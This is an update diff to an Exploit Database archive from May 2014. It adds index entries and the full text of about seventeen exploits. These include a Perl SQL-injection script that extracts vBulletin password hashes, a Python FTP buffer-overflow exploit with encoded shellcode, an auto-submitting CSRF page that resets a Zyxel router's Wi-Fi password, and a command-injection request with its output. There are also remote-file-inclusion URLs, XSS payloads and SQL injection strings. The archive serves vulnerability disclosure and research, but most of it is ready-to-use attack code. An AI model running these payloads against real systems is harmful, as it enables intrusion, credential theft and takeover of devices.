Updated 05_29_2014

files.csv

@@ -30174,6 +30174,7 @@ id,file,description,date,author,platform,type,port
 33488,platforms/php/webapps/33488.txt,"Active Calendar 1.2 '$_SERVER['PHP_SELF']' Variable Multiple Cross Site Scripting Vulnerabilities",2010-01-11,"Martin Barbella",php,webapps,0
 33489,platforms/multiple/remote/33489.txt,"Ruby <= 1.9.1 WEBrick Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0
 33490,platforms/multiple/remote/33490.txt,"nginx 0.7.64 Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0
+33494,platforms/cgi/webapps/33494.txt,"Web Terra 1.1 - books.cgi Remote Command Execution",2014-05-24,"felipe andrian",cgi,webapps,0
 33495,platforms/windows/dos/33495.py,"Core FTP Server Version 1.2, build 535, 32-bit - Crash P.O.C.",2014-05-24,"Kaczinski Ramirez",windows,dos,0
 33497,platforms/multiple/remote/33497.txt,"AOLServer Terminal <= 4.5.1 Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0
 33498,platforms/multiple/remote/33498.txt,"Varnish 2.0.6 Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0
@@ -30191,9 +30192,11 @@ id,file,description,date,author,platform,type,port
 33510,platforms/php/webapps/33510.txt,"Tribisur 'cat' Parameter Cross Site Scripting Vulnerability",2010-01-13,"ViRuSMaN ",php,webapps,0
 33511,platforms/multiple/webapps/33511.txt,"Zenoss 2.3.3 Multiple SQL Injection Vulnerabilities",2010-01-14,"nGenuity Information Services",multiple,webapps,0
 33516,platforms/linux/local/33516.txt,"Linux kernel 3.14-rc1 <= 3.15-rc4 - Raw Mode PTY Local Echo Race Condition (x64) Local Privilege Escalation",2014-05-26,"Matthew Daley",linux,local,0
+33518,platforms/hardware/webapps/33518.txt,"Zyxel P-660HW-T1 v3 Wireless Router - CSRF Vulnerability",2014-05-26,"Mustafa ALTINKAYNAK",hardware,webapps,80
 33520,platforms/hardware/webapps/33520.txt,"D-Link Routers - Multiple Vulnerabilities",2014-05-26,"Kyle Lovett",hardware,webapps,80
 33521,platforms/multiple/remote/33521.rb,"Symantec Workspace Streaming Arbitrary File Upload",2014-05-26,metasploit,multiple,remote,9855
 33523,platforms/linux/local/33523.c,"Linux Kernel 2.6.x 'fasync_helper()' Local Privilege Escalation Vulnerability",2009-12-16,"Tavis Ormandy",linux,local,0
+33524,platforms/linux/dos/33524.txt,"OpenOffice 3.1 - '.csv' File Remote Denial of Service Vulnerability",2010-01-14,"Hellcode Research",linux,dos,0
 33525,platforms/php/remote/33525.txt,"Zend Framework <= 1.9.6 Multiple Input Validation Vulnerabilities and Security Bypass Weakness",2010-01-14,"draic Brady",php,remote,0
 33526,platforms/php/webapps/33526.txt,"Technology for Solutions 1.0 'id' Parameter Cross Site Scripting Vulnerability",2010-01-14,PaL-D3v1L,php,webapps,0
 33527,platforms/unix/dos/33527.py,"IBM Tivoli Directory Server 6.2 'ibmdiradm' Null Pointer Dereference Denial of Service Vulnerability",2006-04-01,Intevydis,unix,dos,0
@@ -30206,3 +30209,17 @@ id,file,description,date,author,platform,type,port
 33534,platforms/php/webapps/33534.txt,"TestLink <= 1.8.5 'order_by_login_dir' Parameter Cross Site Scripting Vulnerability",2010-01-18,"Prashant Khandelwal",php,webapps,0
 33535,platforms/linux/remote/33535.txt,"SystemTap 1.0 'stat-server' Remote Arbitrary Command Injection Vulnerability",2010-01-15,"Frank Ch. Eigler",linux,remote,0
 33536,platforms/multiple/remote/33536.txt,"Zenoss 2.3.3 Multiple Cross Site Request Forgery Vulnerabilities",2010-01-18,"Adam Baldwin",multiple,remote,0
+33538,platforms/windows/remote/33538.py,"Easy File Sharing FTP Server 3.5 - Stack Buffer Overflow",2014-05-27,superkojiman,windows,remote,21
+33540,platforms/windows/remote/33540.txt,"SurgeFTP 2.x 'surgeftpmgr.cgi' Multiple Cross Site Scripting Vulnerabilities",2010-01-18,indoushka,windows,remote,0
+33541,platforms/php/webapps/33541.txt,"DataLife Engine 8.3 engine/inc/include/init.php selected_language Parameter Remote File Inclusion",2010-01-19,indoushka,php,webapps,0
+33542,platforms/php/webapps/33542.txt,"DataLife Engine 8.3 engine/inc/help.php config[langs] Parameter Remote File Inclusion",2010-01-19,indoushka,php,webapps,0
+33543,platforms/php/webapps/33543.txt,"DataLife Engine 8.3 engine/ajax/pm.php config[lang] Parameter Remote File Inclusion",2010-01-19,indoushka,php,webapps,0
+33544,platforms/php/webapps/33544.txt,"DataLife Engine 8.3 engine/ajax/addcomments.php _REQUEST[skin] Parameter Remote File Inclusion",2010-01-19,indoushka,php,webapps,0
+33545,platforms/php/webapps/33545.txt,"Jokes Complete Website joke.php id Parameter XSS",2010-01-18,indoushka,php,webapps,0
+33546,platforms/php/webapps/33546.txt,"Jokes Complete Website results.php searchingred Parameter XSS",2010-01-18,indoushka,php,webapps,0
+33547,platforms/php/webapps/33547.pl,"vBulletin 4.0.1 'misc.php' SQL Injection Vulnerability",2010-01-18,indoushka,php,webapps,0
+33548,platforms/php/webapps/33548.txt,"THELIA 1.4.2.1Multiple Cross Site Scripting Vulnerabilities",2010-01-18,EsSandRe,php,webapps,0
+33550,platforms/php/webapps/33550.txt,"VisualShapers ezContents <= 2.0.3 Authentication Bypass and Multiple SQL Injection Vulnerabilities",2010-01-19,"AmnPardaz Security Research Team",php,webapps,0
+33551,platforms/php/webapps/33551.txt,"PHPMySpace Gold 8.0 'gid' Parameter SQL Injection Vulnerability",2010-01-20,Ctacok,php,webapps,0
+33552,platforms/windows/remote/33552.txt,"Microsoft Internet Explorer 8 URI Validation Remote Code Execution Vulnerability",2010-01-21,"Lostmon Lords",windows,remote,0
+33553,platforms/multiple/remote/33553.txt,"Sun Java System Web Server 6.1/7.0 Digest Authentication Remote Buffer Overflow Vulnerability",2010-01-21,Intevydis,multiple,remote,0

platforms/cgi/webapps/33494.txt

@@ -0,0 +1,46 @@
+[+] Remote Comand Execution on books.cgi Web Terra v. 1.1
+[+] Date: 21/05/2014
+[+] CWE number: CWE-78
+[+] Risk: High
+[+] Author: Felipe Andrian Peixoto
+[+] Contact: felipe_andrian@hotmail.com
+[+] Tested on: Windows 7 and Linux
+[+] Vendor Homepage: http://www2.inforyoma.or.jp/~terra
+[+] Vulnerable File: books.cgi
+[+] Version : 1.1
+[+] Exploit: http://host/patch/books.cgi?file=|<command>|
+
+
+[+] Example Request:
+GET /webnovel/books.cgi?file=|id| HTTP/1.1
+Host: redsuns.x0.com
+User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: keep-alive
+
+
+HTTP/1.1 200 OK
+Date: Wed, 21 May 2014 18:59:05 GMT
+Server: Apache/1.3.42 (Unix)
+Connection: close
+Content-Type: text/html
+Content-Length: 498
+
+<!DOCTYPE HTML PUBLIC -//IETF//DTD HTML//EN>
+<html><head>
+<meta http-equiv=Content-Type content=text/html; charset=x-sjis>
+<title></title></head>
+<body bgcolor=#637057>
+<p align=center><font size=3></font><br>
+| <a href=booksregist.cgi?file=|id|&subject=>?·?M?·?é</a>
+ || <a href=booksvew.cgi?file=|id|&subject=>???Ò?ê??</a>
+ || <a href=booksedit.cgi?file=|id|&subject=>?Ï<>X?ù<>³</a>
+ || <a href=books.htm>?¶?É?É?ß?é</a>
+ |</p><hr>
+uid=1085(spider) gid=1000(users) groups=1000(users)
+</body></html>
+
+[+] More About : http://cwe.mitre.org/data/definitions/78.html

platforms/hardware/webapps/33518.txt

@@ -0,0 +1,49 @@
+# Exploit Title: Zyxel P-660HW-T1 v3 Wireless Router - CSRF Vulnerabilities
+# Date: 05/22/2014
+# Author: Mustafa ALTINKAYNAK
+# Vendor Homepage:http://www.zyxel.com/tr/tr/products_services/p_660hw_series.shtml?t=p
+# Category: Hardware/Wireless Router
+# Tested on: Zyxel P-660HW-T1 v3 Wireless Router
+# Patch/ Fix: Vendor has not provided any fix for this yet
+---------------------------
+ 
+Technical Details
+---------------------------
+This vulnerability was tested at the P-660HW-T1 devices. Admin panel is open you can run remote code destination.
+You can send the form below to prepare the target. Please offending. Being partners in crime.
+
+Disclosure Timeline
+---------------------------
+05/21/2014  Contacted Vendor 
+05/22/2014  Vendor Replied
+04/22/2014  Vulnerability Explained (No reply received)
+05/23/2014  Full Disclosure
+
+Exploit Code 
+---------------------------
+ 
+Change Wifi (WPA2/PSK) password & SSID by CSRF
+---------------------------------------------------------------------------------
+<html>
+<body onload="document.form.submit();">
+<form action="http://192.168.1.1/Forms/WLAN_General_1"
+method="POST" name="form">
+<input type="hidden" name="EnableWLAN" value="on">
+<input type="hidden" name="Channel_ID" value="00000005">
+<input type="hidden" name="ESSID" value="WIFI NAME">
+<input type="hidden" name="Security_Sel" value="00000002">
+<input type="hidden" name="SecurityFlag" value="0">
+<input type="hidden" name="WLANCfgPSK" value="123456">
+<input type="hidden" name="WLANCfgWPATimer" value="1800">
+<input type="hidden" name="QoS_Sel" value="00000000">
+<input type="hidden" name="sysSubmit" value="Uygula">
+</form>
+</body>
+</html> 
+
+-----------
+
+Mustafa ALTINKAYNAK
+twitter : @m_altinkaynak <https://twitter.com/m_altinkaynak>
+www.mustafaaltinkaynak.com
+

platforms/linux/dos/33524.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/37807/info
+
+
+OpenOffice is prone to a remote denial-of-service vulnerability.
+
+Attackers can exploit this issue by enticing an unsuspecting victim to open a specially crafted '.csv' file.
+
+Successful exploits will cause the application to crash, denying service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
+
+OpenOffice 3.1.0 and 3.1.1 on Microsoft Windows are affected. 
+
+http://www.exploit-db.com/sploits/33524.rar

platforms/multiple/remote/33553.txt

@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/37896/info
+
+Sun Java System Web Server is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
+
+Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
+
+The issues affects the following:
+
+Sun Java System Web Server 7.0 without Update Release 8
+Sun Java System Web Server 6.1 without Service Pack 12
+Sun Java System Web Proxy Server 4.0 without Service pack 13 
+
+buf = "PUT / HTTP/1.0\n"
+buf += "Authorization: Digest "
+buf += "ABCD,"*1000
+buf += "\n\n" 

platforms/php/webapps/33541.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37851/info
+
+Datalife Engine is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.
+
+Datalife Engine 8.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/engine/inc/include/init.php?selected_language=http://www.example2.com

platforms/php/webapps/33542.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37851/info
+ 
+Datalife Engine is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+ 
+Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.
+ 
+Datalife Engine 8.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/engine/inc/help.php?config[langs]=http://www.example2.com

platforms/php/webapps/33543.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37851/info
+  
+Datalife Engine is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+  
+Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.
+  
+Datalife Engine 8.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/engine/ajax/pm.php?config[lang_=http://www.example2.com

platforms/php/webapps/33544.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37851/info
+   
+Datalife Engine is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+   
+Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.
+   
+Datalife Engine 8.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/engine/ajax/addcomments.php?_REQUEST[skin]]=http://www.example2.com 

platforms/php/webapps/33545.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/37852/info
+
+EasySiteNetwork Jokes Complete Website is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/Jokes/joke.php?id=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&listtype=1

platforms/php/webapps/33546.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/37852/info
+ 
+EasySiteNetwork Jokes Complete Website is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+http://www.example.com/Jokes/results.php?searchingred=<img+src=http://www.example.com/cars.jpg+onload=alert(213771818860)> 

platforms/php/webapps/33547.pl

@@ -0,0 +1,88 @@
+source: http://www.securityfocus.com/bid/37854/info
+
+vBulletin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+vBulletin 4.0.1. is vulnerable; other versions may also be affected. 
+
+#!/usr/bin/perl 
+ 
+use IO::Socket; 
+ 
+ 
+print q{ 
+#######################################################################
+#    vBulletin? Version 4.0.1 Remote SQL Injection Exploit            #
+#                      By indoushka                                   #
+#                     www.iq-ty.com/vb                                #
+#               Souk Naamane  (00213771818860)                        #
+#           Algeria Hackerz (indoushka@hotmail.com)                   # 
+#          Dork: Powered by vBulletin? Version 4.0.1                  #            
+####################################################################### 
+}; 
+ 
+if (!$ARGV[2]) { 
+ 
+print q{ 
+	Usage: perl  VB4.0.1.pl host /directory/ victim_userid 
+ 
+       perl  VB4.0.1.pl www.vb.com /forum/ 1 
+ 
+ 
+}; 
+ 
+} 
+ 
+ 
+$server = $ARGV[0]; 
+$dir    = $ARGV[1]; 
+$user   = $ARGV[2]; 
+$myuser = $ARGV[3]; 
+$mypass = $ARGV[4]; 
+$myid   = $ARGV[5]; 
+ 
+print "------------------------------------------------------------------------------------------------\r\n"; 
+print "[>] SERVER: $server\r\n"; 
+print "[>]    DIR: $dir\r\n"; 
+print "[>] USERID: $user\r\n"; 
+print "------------------------------------------------------------------------------------------------\r\n\r\n"; 
+ 
+$server =~ s/(http:\/\/)//eg; 
+ 
+$path  = $dir; 
+$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid= '".$user ; 
+ 
+ 
+print "[~] PREPARE TO CONNECT...\r\n"; 
+ 
+$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED"; 
+ 
+print "[+] CONNECTED\r\n"; 
+print "[~] SENDING QUERY...\r\n"; 
+print $socket "GET $path HTTP/1.1\r\n"; 
+print $socket "Host: $server\r\n"; 
+print $socket "Accept: */*\r\n"; 
+print $socket "Connection: close\r\n\r\n"; 
+print "[+] DONE!\r\n\r\n"; 
+ 
+ 
+ 
+print "--[ REPORT ]------------------------------------------------------------------------------------\r\n"; 
+while ($answer = <$socket>) 
+{ 
+ 
+ if ($answer =~/(\w{32})/) 
+{ 
+ 
+  if ($1 ne 0) { 
+   print "Password is: ".$1."\r\n"; 
+print "--------------------------------------------------------------------------------------\r\n"; 
+ 
+      } 
+exit(); 
+} 
+ 
+} 
+print "------------------------------------------------------------------------------------------------\r\n";
+

platforms/php/webapps/33548.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/37855/info
+
+THELIA is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+The issues affect THELIA 1.4.2.1; other versions may also be affected.
+
+
+http://www.example.com/panier.php?action=ajouter&ref=">
+http://www.example.com/produit.php?ref=%22%3E%3Cscript%3Ealert%28/xss/.source%29;%3C/script%3E&id_rubrique=1
+http://www.example.com/rss.php?ref=">&id_rubrique= 

platforms/php/webapps/33550.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/37858/info
+
+VisualShapers ezContents is prone to an authentication-bypass vulnerability and multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+ezContents 2.0.3 is vulnerable; other versions may also be affected.
+
+The following example data is available:
+
+login page: admin' AND IF(@Condition,BENCHMARK(1000000, md5(10)),2) OR '1'='1 

platforms/php/webapps/33551.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37881/info
+
+PHPMySpace Gold is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+PHPMySpace Gold 8.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/modules/arcade/index.php?act=play_game&gid=-1+UNION+SELECT+1,2,3,user(),5%23 

platforms/windows/remote/33538.py

@@ -0,0 +1,62 @@
+#!/usr/bin/env python
+# Exploit Title: Easy File Sharing FTP Server 3.5 stack buffer overflow
+# Date: 27 May 2014
+# Exploit Author: superkojiman - http://www.techorganic.com
+# Vulnerability discovered by: h07
+# CVE: CVE-2006-3952
+# OSVDB: 27646
+# Vendor Homepage: http://www.efssoft.com
+# Software Link: http://www.efssoft.com/ftpserver.htm
+# Version: 3.5
+# Tested on: Windows 8.1 Enterprise , English
+#          : Windows 7 Enterprise SP1, English
+#          : Windows XP SP3, English
+#
+# Description: 
+# A buffer overflow is triggered when when a large password is sent to the 
+# server.
+#
+# h07 found this bug in 2006, targetting EFS FTP Server 2.0. The original 
+# exploits relied on OS DLLs to reference a pop/pop/retn address to leverage a 
+# SEH attack. This was a bit unreliable as different versions of Windows would 
+# have different addresses and the exploit would need to be modified with the 
+# correct pop/pop/retn address. 
+#
+# Fast forward to 2014. EFS FTP Server is now at version 3.5 (2012) and 
+# includes new features, such as SSL support. Ironically, by adding SSL 
+# support, they've given us a reliable pop/pop/retn address in the included 
+# SSLEAY32.DLL! This exploit should work reliably with any Windows release. 
+
+
+import socket
+import struct
+
+# calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/
+# msfencode -b "\x00\x20" -i w32-exec-calc-shellcode.bin 
+# [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1)
+shellcode = ( 
+"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +
+"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +
+"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +
+"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +
+"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +
+"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +
+"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +
+"\x1c\x39\xbd"
+)
+
+payload = "\x2c"
+payload += "A"*2559
+payload += "\xeb\x19\x90\x90"               # jmp to nop sled + shellcode
+payload += struct.pack("<I", 0x10017F21)    # pop/pop/ret, SSLEAY32.DLL
+payload += "\x90"*30
+payload += shellcode
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect(("192.168.1.130", 21))
+s.recv(1024)
+s.send("USER anonymous\r\n")
+s.recv(1024)
+s.send("PASS " + payload + "\r\n")
+s.recv(1024)
+s.close()

platforms/windows/remote/33540.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/37844/info
+
+SurgeFTP is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML or JavaScript code could run in an administrator's browser session in the context of the affected site. This could potentially allow the attacker to steal cookie-based authentication credentials; other attacks are also possible.
+
+SurgeFTP 2.3a6 is vulnerable; other versions may also be affected. 
+
+http://www.example.com:7021/cgi/surgeftpmgr.cgi?domainid=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&cmd=user_admin
+http://www.example.com:7021/cgi/surgeftpmgr.cgi?domainid=-1&cmd=class&classid=<img+src=http://127.0.0.1/t.gif+onload=alert(213771818860)>
+http://www.example.com:7021/cgi/surgeftpmgr.cgi?cmd=class&domainid=0&classid=%3CSCRIPT%20SRC=http://www.example.com/xss.js%3E%3C/SCRIPT%3E

platforms/windows/remote/33552.txt

@@ -0,0 +1,92 @@
+source: http://www.securityfocus.com/bid/37884/info
+
+Microsoft Internet Explorer is prone to a remote code-execution vulnerability.
+
+Attackers can exploit this issue to execute arbitrary code in the context of the user running the application. Successful exploits will compromise the application and possibly the computer.
+
+NOTE: Reports indicate that the issue can also be exploited via other applications that use the 'ShellExecute()' API. 
+
+############# PoC one #################
+<html>
+<iframe id="myIframe"
+src="handler:handler#:../../../../C:\windows/calc.exe">
+</html>
+
+############## PoC Two #############
+<html>
+<iframe id="myIframe"
+src="handler:handler#:../../../../C:\our_txtfile.txt">
+</html>
+
+############# PoC Three ###############
+<html>
+<iframe id="myIframe"
+src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms">
+</iframe>
+</html>
+
+############# PoC four ##############
+
+<html>
+<head>
+</head>
+<body>
+<script type="text/javascript">
+function getContentFromIframe(iFrameName)
+{
+var myIFrame = document.getElementById(iFrameName);
+var content = myIFrame.contentWindow.document.body.innerHTML;
+alert('content: ' + content);
+
+content = 'change iframe content';
+myIFrame.contentWindow.document.body.innerHTML = content;
+}
+</script> <iframe id="myIframe"
+src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms"></iframe>
+
+<a href="#" onclick="getContentFromIframe('myIframe')">Get the content</a>
+
+</body>
+</html>
+
+########### PoC Five ######################
+var contents;
+var req;
+req = new XMLHttpRequest();
+req.onreadystatechange = processReqChange;
+req.open(’GET’,
+‘handler:document.write%28'shit#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms’,
+true);
+req.send(”);
+
+############### PoC six #############
+
+<html><body><div>
+
+<script>
+function getHTTPObject()
+{
+if (typeof XMLHttpRequest != 'undefined')
+{
+return new XMLHttpRequest();
+}
+try {
+return new ActiveXObject("Msxml2.XMLHTTP"); }
+catch (e)
+{
+try
+{
+return new ActiveXObject("Microsoft.XMLHTTP");
+}
+catch (e) {}
+}
+return false;
+}
+x = getHTTPObject();
+x.open("GET","shit:shit#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms",false);
+x.send(null);
+alert(x.responseText);
+
+</script>
+
+</div></body></html>